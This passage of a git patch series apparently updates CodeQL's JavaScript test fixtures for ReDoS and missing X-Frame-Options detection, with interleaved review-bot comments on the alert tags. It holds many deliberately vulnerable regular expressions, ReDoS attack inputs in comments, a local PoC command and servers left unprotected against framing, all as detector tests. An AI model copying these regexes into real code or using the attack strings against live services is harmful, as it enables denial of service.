-var bad1 = /^\b_((?:__|[\s\S])+?)_\b|^\*((?:\*\*|[\s\S])+?)\*(?!\*)/; // $ Alert - attack: "_" + "__".repeat(100)
+var bad1 = /^\b_((?:__|[\s\S])+?)_\b|^\*((?:\*\*|[\s\S])+?)\*(?!\*)/; // $ Alert[js/redos] - attack: "_" + "__".repeat(100)
 // Adapted from marked (https://github.com/markedjs/marked), which is licensed
@@ -14,7 +14,7 @@ var good2 = /(.*,)+.+/;
 // Adapted from CodeMirror (https://github.com/codemirror/codemirror),
 // which is licensed under the MIT license; see file CodeMirror-LICENSE.
-var bad2 = /^(?:\s+(?:"(?:[^"\\]|\\\\|\\.)+"|'(?:[^'\\]|\\\\|\\.)+'|\((?:[^)\\]|\\\\|\\.)+\)))?/; // $ Alert - attack: " '" + "\\\\".repeat(100)
+var bad2 = /^(?:\s+(?:"(?:[^"\\]|\\\\|\\.)+"|'(?:[^'\\]|\\\\|\\.)+'|\((?:[^)\\]|\\\\|\\.)+\)))?/; // $ Alert[js/redos] - attack: " '" + "\\\\".repeat(100)
 // Adapted from lulucms2 (https://github.com/yiifans/lulucms2).
@@ -25,117 +25,117 @@ var good2 = /\(\*(?:[\s\S]*?\(\*[\s\S]*?\*\))*[\s\S]*?\*\)/; // under the MIT license; see file jest-LICENSE. var good3 = /^ *(\S.*\|.*)\n *([-:]+ *\|[-| :]*)\n((?:.*\|.*(?:\n|$))*)\n*/; -var bad4 = /^ *(\S.*\|.*)\n *([-:]+ *\|[-| :]*)\n((?:.*\|.*(?:\n|$))*)a/; // $ Alert - variant of good3; attack: "a|\n:|\n" + "||\n".repeat(100) +var bad4 = /^ *(\S.*\|.*)\n *([-:]+ *\|[-| :]*)\n((?:.*\|.*(?:\n|$))*)a/; // $ Alert[js/redos] - variant of good3; attack: "a|\n:|\n" + "||\n".repeat(100) // Adapted from ANodeBlog (https://github.com/gefangshuai/ANodeBlog), // which is licensed under the Apache License 2.0; see file ANodeBlog-LICENSE. -var bad5 = /\/(?![ *])(\\\/|.)*?\/[gim]*(?=\W|$)/; // $ Alert - attack: "/" + "\\/a".repeat(100) +var bad5 = /\/(?![ *])(\\\/|.)*?\/[gim]*(?=\W|$)/; // $ Alert[js/redos] - attack: "/" + "\\/a".repeat(100) // Adapted from CodeMirror (https://github.com/codemirror/codemirror), // which is licensed under the MIT license; see file CodeMirror-LICENSE. -var bad6 = /^([\s\[\{\(]|#.*)*$/; // $ Alert - attack: "##".repeat(100) + "\na" +var bad6 = /^([\s\[\{\(]|#.*)*$/; // $ Alert[js/redos] - attack: "##".repeat(100) + "\na" var good4 = /(\r\n|\r|\n)+/; // BAD - PoC: `node -e "/((?:[^\"\']|\".*?\"|\'.*?\')*?)([(,)]|$)/.test(\"'''''''''''''''''''''''''''''''''''''''''''''\\\"\");"`. It's complicated though, because the regexp still matches something, it just matches the empty-string after the attack string. 
-var actuallyBad = /((?:[^"']|".*?"|'.*?')*?)([(,)]|$)/; +var actuallyBad = /((?:[^"']|".*?"|'.*?')*?)([(,)]|$)/; // $ Alert[js/redos] // Adapted from Knockout (https://github.com/knockout/knockout), which is // licensed under the MIT license; see file knockout-LICENSE -var bad6 = /^[\_$a-z][\_$a-z0-9]*(\[.*?\])*(\.[\_$a-z][\_$a-z0-9]*(\[.*?\])*)*$/i; // $ Alert - attack: "a" + "[]".repeat(100) + ".b\n" +var bad6 = /^[\_$a-z][\_$a-z0-9]*(\[.*?\])*(\.[\_$a-z][\_$a-z0-9]*(\[.*?\])*)*$/i; // $ Alert[js/redos] - attack: "a" + "[]".repeat(100) + ".b\n" var good6 = /(a|.)*/; // Testing the NFA - only some of the below are detected. -var bad7 = /^([a-z]+)+$/; // $ Alert -var bad8 = /^([a-z]*)*$/; // $ Alert -var bad9 = /^([a-zA-Z0-9])(([\\-.]|[_]+)?([a-zA-Z0-9]+))*(@){1}[a-z0-9]+[.]{1}(([a-z]{2,3})|([a-z]{2,3}[.]{1}[a-z]{2,3}))$/; // $ Alert -var bad10 = /^(([a-z])+.)+[A-Z]([a-z])+$/; // $ Alert +var bad7 = /^([a-z]+)+$/; // $ Alert[js/redos] +var bad8 = /^([a-z]*)*$/; // $ Alert[js/redos] +var bad9 = /^([a-zA-Z0-9])(([\\-.]|[_]+)?([a-zA-Z0-9]+))*(@){1}[a-z0-9]+[.]{1}(([a-z]{2,3})|([a-z]{2,3}[.]{1}[a-z]{2,3}))$/; // $ Alert[js/redos] +var bad10 = /^(([a-z])+.)+[A-Z]([a-z])+$/; // $ Alert[js/redos] // Adapted from Prototype.js (https://github.com/prototypejs/prototype), which // is licensed under the MIT license; see file Prototype.js-LICENSE. -var bad11 = /(([\w#:.~>+()\s-]+|\*|\[.*?\])+)\s*(,|$)/; // $ Alert - attack: "[" + "][".repeat(100) + "]!" +var bad11 = /(([\w#:.~>+()\s-]+|\*|\[.*?\])+)\s*(,|$)/; // $ Alert[js/redos] - attack: "[" + "][".repeat(100) + "]!" // Adapted from Prism (https://github.com/PrismJS/prism), which is licensed // under the MIT license; see file Prism-LICENSE. 
-var bad12 = /("|')(\\?.)*?\1/g; // $ Alert - attack: "'" + "\\a".repeat(100) + '"' +var bad12 = /("|')(\\?.)*?\1/g; // $ Alert[js/redos] - attack: "'" + "\\a".repeat(100) + '"' -var bad13 = /(b|a?b)*c/; // $ Alert +var bad13 = /(b|a?b)*c/; // $ Alert[js/redos] -var bad15 = /(a|aa?)*b/; // $ Alert +var bad15 = /(a|aa?)*b/; // $ Alert[js/redos] var good7 = /(.|\n)*!/; -var bad16 = /(.|\n)*!/s; // $ Alert - attack: "\n".repeat(100) + "." +var bad16 = /(.|\n)*!/s; // $ Alert[js/redos] - attack: "\n".repeat(100) + "." var good8 = /([\w.]+)*/; -var bad17 = new RegExp('(a|aa?)*b'); // $ Alert +var bad17 = new RegExp('(a|aa?)*b'); // $ Alert[js/redos] // OK - not used as regexp var good9 = '(a|aa?)*b'; -var bad18 = /(([^]|[^a])*)"/; // $ Alert +var bad18 = /(([^]|[^a])*)"/; // $ Alert[js/redos] // OK - there is no witness in the end that could cause the regexp to not match var good10 = /([^"']+)*/g; -var bad20 = /((.|[^a])*)"/; // $ Alert +var bad20 = /((.|[^a])*)"/; // $ Alert[js/redos] var good10 = /((a|[^a])*)"/; -var bad21 = /((b|[^a])*)"/; // $ Alert +var bad21 = /((b|[^a])*)"/; // $ Alert[js/redos] -var bad22 = /((G|[^a])*)"/; // $ Alert +var bad22 = /((G|[^a])*)"/; // $ Alert[js/redos] -var bad23 = /(([0-9]|[^a])*)"/; // $ Alert +var bad23 = /(([0-9]|[^a])*)"/; // $ Alert[js/redos] -var bad24 = /(?:=(?:([!#\$%&'\*\+\-\.\^_`\|~0-9A-Za-z]+)|"((?:\\[\x00-\x7f]|[^\x00-\x08\x0a-\x1f\x7f"])*)"))?/; // $ Alert +var bad24 = /(?:=(?:([!#\$%&'\*\+\-\.\^_`\|~0-9A-Za-z]+)|"((?:\\[\x00-\x7f]|[^\x00-\x08\x0a-\x1f\x7f"])*)"))?/; // $ Alert[js/redos] -var bad25 = /"((?:\\[\x00-\x7f]|[^\x00-\x08\x0a-\x1f\x7f"])*)"/; // $ Alert +var bad25 = /"((?:\\[\x00-\x7f]|[^\x00-\x08\x0a-\x1f\x7f"])*)"/; // $ Alert[js/redos] var fix25 = /"((?:\\[\x00-\x7f]|[^\x00-\x08\x0a-\x1f\x7f"\\])*)"/; // OK - fixed version of bad25 -var bad27 = /(([a-z]|[d-h])*)"/; // $ Alert +var bad27 = /(([a-z]|[d-h])*)"/; // $ Alert[js/redos] -var bad27 = /(([^a-z]|[^0-9])*)"/; // $ Alert +var bad27 = 
/(([^a-z]|[^0-9])*)"/; // $ Alert[js/redos] -var bad28 = /((\d|[0-9])*)"/; // $ Alert +var bad28 = /((\d|[0-9])*)"/; // $ Alert[js/redos] -var bad29 = /((\s|\s)*)"/; // $ Alert +var bad29 = /((\s|\s)*)"/; // $ Alert[js/redos] -var bad30 = /((\w|G)*)"/; // $ Alert +var bad30 = /((\w|G)*)"/; // $ Alert[js/redos] var good11 = /((\s|\d)*)"/; -var bad31 = /((\d|\w)*)"/; // $ Alert +var bad31 = /((\d|\w)*)"/; // $ Alert[js/redos] -var bad32 = /((\d|5)*)"/; // $ Alert +var bad32 = /((\d|5)*)"/; // $ Alert[js/redos] -var bad33 = /((\s|[\f])*)"/; // $ Alert +var bad33 = /((\s|[\f])*)"/; // $ Alert[js/redos] -var bad34 = /((\s|[\v]|\\v)*)"/; // $ Alert +var bad34 = /((\s|[\v]|\\v)*)"/; // $ Alert[js/redos] -var bad35 = /((\f|[\f])*)"/; // $ Alert +var bad35 = /((\f|[\f])*)"/; // $ Alert[js/redos] -var bad36 = /((\W|\D)*)"/; // $ Alert +var bad36 = /((\W|\D)*)"/; // $ Alert[js/redos] -var bad37 = /((\S|\w)*)"/; // $ Alert +var bad37 = /((\S|\w)*)"/; // $ Alert[js/redos] -var bad38 = /((\S|[\w])*)"/; // $ Alert +var bad38 = /((\S|[\w])*)"/; // $ Alert[js/redos] -var bad39 = /((1s|[\da-z])*)"/; // $ Alert +var bad39 = /((1s|[\da-z])*)"/; // $ Alert[js/redos] -var bad40 = /((0|[\d])*)"/; // $ Alert +var bad40 = /((0|[\d])*)"/; // $ Alert[js/redos] -var bad41 = /(([\d]+)*)"/; // $ Alert +var bad41 = /(([\d]+)*)"/; // $ Alert[js/redos] // OK - there is no witness in the end that could cause the regexp to not match var good12 = /(\d+(X\d+)?)+/; 
@@ -146,38 +146,38 @@ var good13 = /([0-9]+(X[0-9]*)?)*/; var good15 = /^([^>]+)*(>|$)/; -var bad43 = /^([^>a]+)*(>|$)/; // $ Alert +var bad43 = /^([^>a]+)*(>|$)/; // $ Alert[js/redos] -var bad44 = /(\n\s*)+$/; // $ Alert +var bad44 = /(\n\s*)+$/; // $ Alert[js/redos] -var bad45 = /^(?:\s+|#.*|\(\?#[^)]*\))*(?:[?*+]|{\d+(?:,\d*)?})/; // $ Alert +var bad45 = /^(?:\s+|#.*|\(\?#[^)]*\))*(?:[?*+]|{\d+(?:,\d*)?})/; // $ Alert[js/redos] -var bad46 = /\{\[\s*([a-zA-Z]+)\(([a-zA-Z]+)\)((\s*([a-zA-Z]+)\: ?([ a-zA-Z{}]+),?)+)*\s*\]\}/; // $ Alert +var bad46 = /\{\[\s*([a-zA-Z]+)\(([a-zA-Z]+)\)((\s*([a-zA-Z]+)\: ?([ a-zA-Z{}]+),?)+)*\s*\]\}/; // $ Alert[js/redos] -var bad47 = /(a+|b+|c+)*c/; // $ Alert +var bad47 = /(a+|b+|c+)*c/; // $ Alert[js/redos] -var bad48 = /(((a+a?)*)+b+)/; // $ Alert +var bad48 = /(((a+a?)*)+b+)/; // $ Alert[js/redos] -var bad49 = /(a+)+bbbb/; // $ Alert +var bad49 = /(a+)+bbbb/; // $ Alert[js/redos] var good16 = /(a+)+aaaaa*a+/; -var bad50 = /(a+)+aaaaa$/; // $ Alert +var bad50 = /(a+)+aaaaa$/; // $ Alert[js/redos] var good17 = /(\n+)+\n\n/; -var bad51 = /(\n+)+\n\n$/; // $ Alert +var bad51 = /(\n+)+\n\n$/; // $ Alert[js/redos] -var bad52 = /([^X]+)*$/; // $ Alert +var bad52 = /([^X]+)*$/; // $ Alert[js/redos] -var bad53 = /(([^X]b)+)*$/; // $ Alert +var bad53 = /(([^X]b)+)*$/; // $ Alert[js/redos] var good18 = /(([^X]b)+)*($|[^X]b)/; -var bad54 = /(([^X]b)+)*($|[^X]c)/; // $ Alert +var bad54 = /(([^X]b)+)*($|[^X]c)/; // $ Alert[js/redos] var good20 = /((ab)+)*ababab/; @@ -188,12 +188,12 @@ var good21 = /((ab)+)*abab(ab)*(ab)+/; var good22 = /((ab)+)*/; -var bad55 = /((ab)+)*$/; // $ Alert +var bad55 = /((ab)+)*$/; // $ Alert[js/redos] var good23 = /((ab)+)*[a1][b1][a2][b2][a3][b3]/; -var bad56 = /([\n\s]+)*(.)/; // $ Alert +var bad56 = /([\n\s]+)*(.)/; // $ Alert[js/redos] // OK - any witness passes through the accept state. var good24 = /(A*A*X)*/; 
@@ -201,11 +201,11 @@ var good24 = /(A*A*X)*/; var good26 = /([^\\\]]+)*/ -var bad59 = /(\w*foobarbaz\w*foobarbaz\w*foobarbaz\w*foobarbaz\s*foobarbaz\d*foobarbaz\w*)+-/; // $ Alert +var bad59 = /(\w*foobarbaz\w*foobarbaz\w*foobarbaz\w*foobarbaz\s*foobarbaz\d*foobarbaz\w*)+-/; // $ Alert[js/redos] -var bad60 = /(.thisisagoddamnlongstringforstresstestingthequery|\sthisisagoddamnlongstringforstresstestingthequery)*-/ // $ Alert +var bad60 = /(.thisisagoddamnlongstringforstresstestingthequery|\sthisisagoddamnlongstringforstresstestingthequery)*-/ // $ Alert[js/redos] -var bad61 = /(thisisagoddamnlongstringforstresstestingthequery|this\w+query)*-/ // $ Alert +var bad61 = /(thisisagoddamnlongstringforstresstestingthequery|this\w+query)*-/ // $ Alert[js/redos] var good27 = /(thisisagoddamnlongstringforstresstestingthequery|imanotherbutunrelatedstringcomparedtotheotherstring)*-/ 
@@ -218,102 +218,102 @@ var good29 = /foo((\uDC66|\uDC67)|(\uDC68|\uDC69))*foo/ var bad62 = /a{2,3}(b+)+X/; // $ MISSING: Alert - cannot currently construct a prefix -var bad63 = /^<(\w+)((?:\s+\w+(?:\s*=\s*(?:(?:"[^"]*")|(?:'[^']*')|[^>\s]+))?)*)\s*(\/?)>/; // $ Alert - and a good prefix test +var bad63 = /^<(\w+)((?:\s+\w+(?:\s*=\s*(?:(?:"[^"]*")|(?:'[^']*')|[^>\s]+))?)*)\s*(\/?)>/; // $ Alert[js/redos] - and a good prefix test var good30 = /(a+)*[^][^][^]?/; // GOOD - but we fail to see that repeating the attack string ends in the "accept any" state (due to not parsing the range `[^]{2,3}`). -var good31 = /(a+)*[^]{2,3}/; +var good31 = /(a+)*[^]{2,3}/; // $ Alert[js/redos] // GOOD - but we spuriously conclude that a rejecting suffix exists (due to not parsing the range `[^]{2,}` when constructing the NFA). -var good32 = /(a+)*([^]{2,}|X)$/; +var good32 = /(a+)*([^]{2,}|X)$/; // $ Alert[js/redos] var good33 = /(a+)*([^]*|X)$/; -var bad64 = /((a+)*$|[^]+)/; // $ Alert +var bad64 = /((a+)*$|[^]+)/; // $ Alert[js/redos] var good34 = /([^]+|(a+)*$)/; // $ SPURIOUS: Alert - The only change compared to the above is the order of alternatives, which we don't model. var good35 = /((;|^)a+)+$/; -var bad65 = /(^|;)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(e+)+f/; // $ Alert - a good prefix test +var bad65 = /(^|;)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(e+)+f/; // $ Alert[js/redos] - a good prefix test -var bad66 = /^ab(c+)+$/; // $ Alert +var bad66 = /^ab(c+)+$/; // $ Alert[js/redos] -var bad67 = /(\d(\s+)*){20}/; // $ Alert +var bad67 = /(\d(\s+)*){20}/; // $ Alert[js/redos] // OK - but we spuriously conclude that a rejecting suffix exists. -var good36 = /(([^/]|X)+)(\/[^]*)*$/; +var good36 = /(([^/]|X)+)(\/[^]*)*$/; // $ Alert[js/redos] // OK - but we spuriously conclude that a rejecting suffix exists. 
-var good37 = /^((x([^Y]+)?)*(Y|$))/; +var good37 = /^((x([^Y]+)?)*(Y|$))/; // $ Alert[js/redos] -var bad68 = /(a*)+b/; // $ Alert +var bad68 = /(a*)+b/; // $ Alert[js/redos] -var bad69 = /foo([\w-]*)+bar/; // $ Alert +var bad69 = /foo([\w-]*)+bar/; // $ Alert[js/redos] -var bad70 = /((ab)*)+c/; // $ Alert +var bad70 = /((ab)*)+c/; // $ Alert[js/redos] -var bad71 = /(a?a?)*b/; // $ Alert +var bad71 = /(a?a?)*b/; // $ Alert[js/redos] var good38 = /(a?)*b/; var bad72 = /(c?a?)*b/; // $ MISSING: Alert -var bad73 = /(?:a|a?)+b/; // $ Alert +var bad73 = /(?:a|a?)+b/; // $ Alert[js/redos] var bad74 = /(a?b?)*$/; // $ MISSING: Alert -var bad76 = /PRE(([a-c]|[c-d])T(e?e?e?e?|X))+(cTcT|cTXcTX$)/; // $ Alert +var bad76 = /PRE(([a-c]|[c-d])T(e?e?e?e?|X))+(cTcT|cTXcTX$)/; // $ Alert[js/redos] -var bad77 = /^((a)+\w)+$/; // $ MISSING: Alert +var bad77 = /^((a)+\w)+$/; // $ Alert[js/redos] -var bad78 = /^(b+.)+$/; // $ Alert +var bad78 = /^(b+.)+$/; // $ Alert[js/redos] var good39 = /a*b/; // All 4 bad combinations of nested * and +) -var bad79 = /(a*)*b/; // $ Alert -var bad80 = /(a+)*b/; // $ Alert -var bad81 = /(a*)+b/; // $ Alert -var bad82 = /(a+)+b/; // $ Alert +var bad79 = /(a*)*b/; // $ Alert[js/redos] +var bad80 = /(a+)*b/; // $ Alert[js/redos] +var bad81 = /(a*)+b/; // $ Alert[js/redos] +var bad82 = /(a+)+b/; // $ Alert[js/redos] var good40 = /(a|b)+/; var good41 = /(?:[\s;,"'<>(){}|[\]@=+*]|:(?![/\\]))+/; -var bad83 = /^((?:a{|-)|\w\{)+X$/; // $ Alert -var bad84 = /^((?:a{0|-)|\w\{\d)+X$/; // $ Alert -var bad85 = /^((?:a{0,|-)|\w\{\d,)+X$/; // $ Alert -var bad86 = /^((?:a{0,2|-)|\w\{\d,\d)+X$/; // $ Alert +var bad83 = /^((?:a{|-)|\w\{)+X$/; // $ Alert[js/redos] +var bad84 = /^((?:a{0|-)|\w\{\d)+X$/; // $ Alert[js/redos] +var bad85 = /^((?:a{0,|-)|\w\{\d,)+X$/; // $ Alert[js/redos] +var bad86 = /^((?:a{0,2|-)|\w\{\d,\d)+X$/; // $ Alert[js/redos] var bad86AndAHalf = /^((?:a{0,2}|-)|\w\{\d,\d\})+X$/; // $ MISSING: Alert var good43 = /("[^"]*?"|[^"\s]+)+(?=\s*|\s*$)/g; 
-var bad87 = /("[^"]*?"|[^"\s]+)+(?=\s*|\s*$)X/g; // $ Alert -var bad88 = /("[^"]*?"|[^"\s]+)+(?=X)/g; // $ Alert -var bad89 = /(x*)+(?=$)/ // $ Alert -var bad90 = /(x*)+(?=$|y)/ // $ Alert +var bad87 = /("[^"]*?"|[^"\s]+)+(?=\s*|\s*$)X/g; // $ Alert[js/redos] +var bad88 = /("[^"]*?"|[^"\s]+)+(?=X)/g; // $ Alert[js/redos] +var bad89 = /(x*)+(?=$)/ // $ Alert[js/redos] +var bad90 = /(x*)+(?=$|y)/ // $ Alert[js/redos] // OK - but we spuriously conclude that a rejecting suffix exists. -var good44 = /([\s\S]*)+(?=$)/; -var good45 = /([\s\S]*)+(?=$|y)/; +var good44 = /([\s\S]*)+(?=$)/; // $ Alert[js/redos] +var good45 = /([\s\S]*)+(?=$|y)/; // $ Alert[js/redos] var good46 = /(foo|FOO)*bar/; -var bad91 = /(foo|FOO)*bar/i; // $ Alert +var bad91 = /(foo|FOO)*bar/i; // $ Alert[js/redos] var good47 = /([AB]|[ab])*C/; -var bad92 = /([DE]|[de])*F/i; // $ Alert +var bad92 = /([DE]|[de])*F/i; // $ Alert[js/redos] -var bad93 = /(?<=^v?|\sv?)(a|aa)*$/; // $ Alert -var bad94 = /(a|aa)*$/; // $ Alert +var bad93 = /(?<=^v?|\sv?)(a|aa)*$/; // $ Alert[js/redos] +var bad94 = /(a|aa)*$/; // $ Alert[js/redos] var bad95 = new RegExp( "(a" + 
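Review bot: Six lines in this hunk whose neighbouring comments describe the alert as a false positive are now tagged as expected true positives: `good31`, `good32`, `good36`, `good37`, `good44` and `good45` each gain `// $ Alert[js/redos]` directly under a `// GOOD - but we fail to see …` or `// OK - but we spuriously conclude …` comment. If those comments are still accurate, the form this series uses for `good34` in PATCH 047 fits better and keeps the known false positives visible to whoever later fixes the query, e.g. `var good31 = /(a+)*[^]{2,3}/; // $ SPURIOUS: Alert[js/redos]`. Separately, `bad77` changes from `$ MISSING: Alert` to `$ Alert[js/redos]` inside a commit titled "Add query iDs", while `bad62` keeps its `MISSING` marker until PATCH 046 accepts it in its own commit; if bad77 is likewise a newly fixed false negative, a one-line mention in the commit message, or a separate commit as for bad62, would make that expectation change reviewable.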
@@ -330,16 +330,16 @@ var bad96 = new RegExp("(" + var bad97 = new RegExp( "(g|gg" + - ")*h$"); // $ Alert + ")*h$"); // $ Alert[js/redos] -var bad98 = /^(?:\*\/\*|[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}\/(?:\*|[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126})(?:\s* *; *[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}(?:="?[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}"?)?\s*)*)$/; // $ Alert +var bad98 = /^(?:\*\/\*|[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}\/(?:\*|[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126})(?:\s* *; *[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}(?:="?[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}"?)?\s*)*)$/; // $ Alert[js/redos] var good48 = /(\/(?:\/[\w.-]*)*){0,1}:([\w.-]+)/; -var bad99 = /(a{1,})*b/; // $ Alert +var bad99 = /(a{1,})*b/; // $ Alert[js/redos] -var unicode = /^\n\u0000(\u0000|.)+$/; +var unicode = /^\n\u0000(\u0000|.)+$/; // $ Alert[js/redos] -var largeUnicode = new RegExp("^\n\u{1F680}(\u{1F680}|.)+X$"); +var largeUnicode = new RegExp("^\n\u{1F680}(\u{1F680}|.)+X$"); // $ Alert[js/redos] var unicodeSets = /(aa?)*b/v; From 1fcebcec8716a213439b810f5d268556e79b97e8 Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 14:29:35 +0100 Subject: [PATCH 045/115] JS: Move some ReDoS alerts --- .../ql/test/query-tests/Security/CWE-400/ReDoS/tst.js | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js index 6be96967a643..c2f83ed25aee 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js 
@@ -319,14 +319,14 @@ var bad95 = new RegExp(
 "(a" +
 "|" +
 "aa)*" +
- "b$"
-); // $ Alert
+ "b$" // $ Alert[js/redos]
+);
 var bad96 = new RegExp("(" +
- "(c|cc)*|" +
- "(d|dd)*|" +
+ "(c|cc)*|" + // $ Alert[js/redos]
+ "(d|dd)*|" + // $ Alert[js/redos]
 "(e|ee)*" +
-")f$"); // $ Alert[js/redos]
+")f$"); // $ Alert[js/redos]
 var bad97 = new RegExp(
 "(g|gg" +
From a0f8e287907732be0383d21ca86178b3d904273f Mon Sep 17 00:00:00 2001
From: Asger F
Date: Fri, 21 Feb 2025 14:30:15 +0100
Subject: [PATCH 046/115] JS: Accept a fixed FN
---
 javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js
index c2f83ed25aee..53385682867a 100644
--- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js
+++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js
@@ -216,7 +216,7 @@ var good28 = /foo([\uDC66\uDC67]|[\uDC68\uDC69])*foo/
 var good29 = /foo((\uDC66|\uDC67)|(\uDC68|\uDC69))*foo/
-var bad62 = /a{2,3}(b+)+X/; // $ MISSING: Alert - cannot currently construct a prefix
+var bad62 = /a{2,3}(b+)+X/; // $ Alert[js/redos]
 var bad63 = /^<(\w+)((?:\s+\w+(?:\s*=\s*(?:(?:"[^"]*")|(?:'[^']*')|[^>\s]+))?)*)\s*(\/?)>/; // $ Alert[js/redos] - and a good prefix test
From cded75766f8c5b878358f9bf79888010a7533b41 Mon Sep 17 00:00:00 2001
From: Asger F
Date: Fri, 21 Feb 2025 14:30:32 +0100
Subject: [PATCH 047/115] JS: Add a query ID
---
 javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js
index 53385682867a..c5b183cb273d 100644
--- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js
+++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js
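Review bot: In the `bad96` block the moved markers land on the `"(c|cc)*|" +` and `"(d|dd)*|" +` lines but not on `"(e|ee)*" +`, although the three alternatives are written identically; the remaining marker stays on `")f$");`. A reader cannot tell from the hunk whether the third alternative is reported at the closing line or not reported at all. If it is the former, a short comment on that line, e.g. `"(e|ee)*" + // reported on the closing line below`, records that; if it is the latter, `"(e|ee)*" + // $ MISSING: Alert[js/redos]` records the gap in the form this series already uses.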
@@ -234,7 +234,7 @@ var good33 = /(a+)*([^]*|X)$/;
 var bad64 = /((a+)*$|[^]+)/; // $ Alert[js/redos]
-var good34 = /([^]+|(a+)*$)/; // $ SPURIOUS: Alert - The only change compared to the above is the order of alternatives, which we don't model.
+var good34 = /([^]+|(a+)*$)/; // $ SPURIOUS: Alert[js/redos] - The only change compared to the above is the order of alternatives, which we don't model.
 var good35 = /((;|^)a+)+$/;
From cea53371f2dfceefdded5a1e0c22a6d8bdaf3cae Mon Sep 17 00:00:00 2001
From: Asger F
Date: Fri, 21 Feb 2025 20:01:58 +0100
Subject: [PATCH 048/115] JS: Accept alerts for missing-x-frame-options
---
 javascript/ql/test/query-tests/Security/CWE-451/connect-bad.js | 2 +-
 javascript/ql/test/query-tests/Security/CWE-451/express-bad.js | 2 +-
 javascript/ql/test/query-tests/Security/CWE-451/hapi-bad.js | 2 +-
 javascript/ql/test/query-tests/Security/CWE-451/koa-bad.js | 2 +-
 javascript/ql/test/query-tests/Security/CWE-451/node-bad.js | 2 +-
 javascript/ql/test/query-tests/Security/CWE-451/restify-bad.js | 2 +-
 6 files changed, 6 insertions(+), 6 deletions(-)
diff --git a/javascript/ql/test/query-tests/Security/CWE-451/connect-bad.js b/javascript/ql/test/query-tests/Security/CWE-451/connect-bad.js
index 33372750e587..e224100b4ade 100644
--- a/javascript/ql/test/query-tests/Security/CWE-451/connect-bad.js
+++ b/javascript/ql/test/query-tests/Security/CWE-451/connect-bad.js
@@ -1,7 +1,7 @@
 var connect = require('connect');
 var http = require('http');
-var app = connect();
+var app = connect(); // $ Alert
 app.use(function (req, res){
diff --git a/javascript/ql/test/query-tests/Security/CWE-451/express-bad.js b/javascript/ql/test/query-tests/Security/CWE-451/express-bad.js
index a5b05b3a16b9..7aa58b6b4e15 100644
--- a/javascript/ql/test/query-tests/Security/CWE-451/express-bad.js
+++ b/javascript/ql/test/query-tests/Security/CWE-451/express-bad.js
@@ -1,5 +1,5 @@
 var express = require('express'),
- app = express();
+ app = express(); // $ Alert
 app.get('/', function (req, res) {
diff --git a/javascript/ql/test/query-tests/Security/CWE-451/hapi-bad.js b/javascript/ql/test/query-tests/Security/CWE-451/hapi-bad.js
index 12a18c1cbef5..b9e5d447e72d 100644
--- a/javascript/ql/test/query-tests/Security/CWE-451/hapi-bad.js
+++ b/javascript/ql/test/query-tests/Security/CWE-451/hapi-bad.js
@@ -1,5 +1,5 @@
 var Hapi = require('hapi');
-var server = new Hapi.Server();
+var server = new Hapi.Server(); // $ Alert
 server.route({ handler: function (request, reply){
diff --git a/javascript/ql/test/query-tests/Security/CWE-451/koa-bad.js b/javascript/ql/test/query-tests/Security/CWE-451/koa-bad.js
index 8308b19bee75..5ae9cfe130c4 100644
--- a/javascript/ql/test/query-tests/Security/CWE-451/koa-bad.js
+++ b/javascript/ql/test/query-tests/Security/CWE-451/koa-bad.js
@@ -1,5 +1,5 @@
 var Koa = require('koa');
-var app = new Koa();
+var app = new Koa(); // $ Alert
 app.use(function handler(ctx){ });
diff --git a/javascript/ql/test/query-tests/Security/CWE-451/node-bad.js b/javascript/ql/test/query-tests/Security/CWE-451/node-bad.js
index 4e5fbb685497..2bc553aa7852 100644
--- a/javascript/ql/test/query-tests/Security/CWE-451/node-bad.js
+++ b/javascript/ql/test/query-tests/Security/CWE-451/node-bad.js
@@ -1,4 +1,4 @@
 var http = require('http')
 http.createServer(function (request, response) {
- }).listen(9615)
+ }).listen(9615) // $ Alert
diff --git a/javascript/ql/test/query-tests/Security/CWE-451/restify-bad.js b/javascript/ql/test/query-tests/Security/CWE-451/restify-bad.js
index 3b88523e701a..e48a51efa7e8 100644
--- a/javascript/ql/test/query-tests/Security/CWE-451/restify-bad.js
+++ b/javascript/ql/test/query-tests/Security/CWE-451/restify-bad.js
@@ -1,5 +1,5 @@
 var restify = require('restify');
-var server = restify.createServer();
+var server = restify.createServer(); // $ Alert
 server.head('/', function (request, response){ });
From 260c66b3cf268db2b9c902451b4eb3497fd6d258 Mon Sep 17 00:00:00 2001
From: Asger F
Date: Fri, 21 Feb 2025 20:02:18 +0100
